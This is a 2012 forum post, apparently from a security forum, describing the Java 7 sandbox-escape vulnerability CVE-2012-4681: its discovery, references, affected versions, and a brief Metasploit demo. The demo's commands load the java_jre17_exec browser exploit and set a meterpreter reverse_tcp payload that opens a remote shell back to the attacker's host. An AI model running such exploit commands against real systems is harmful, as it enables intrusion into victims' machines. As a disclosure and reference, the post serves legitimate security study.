Wubi Posted August 28, 2012 Report Posted August 28, 2012 Description:Vulnerability found exploited in the wild and discovered by Michael SchierlFirst details of the vulnerability the 2012-08-26Source code of the vulnerability provided by jduck the 2012-08-26Metasploit PoC provided the 2012-08-27PoC provided by:Unknownjducksinn3rjuan vazquezReference(s) :CVE-2012-4681OSVDB-84867BID-55213Zero-Day Season is Not Over YetJava 7 0-Day vulnerability information and mitigationAffected versions :Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.Tested on Ubuntu 12.04 with :Firefox & Oracle JSE 1.7.0_06-b24Description :This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.Metasploit demo :use exploit/multi/browser/java_jre17_execset SRVHOST 192.168.178.100set TARGET 2set PAYLOAD linux/x86/meterpreter/reverse_tcpset LHOST 192.168.178.100exploitsysinfogetuidSursa YouTube Quote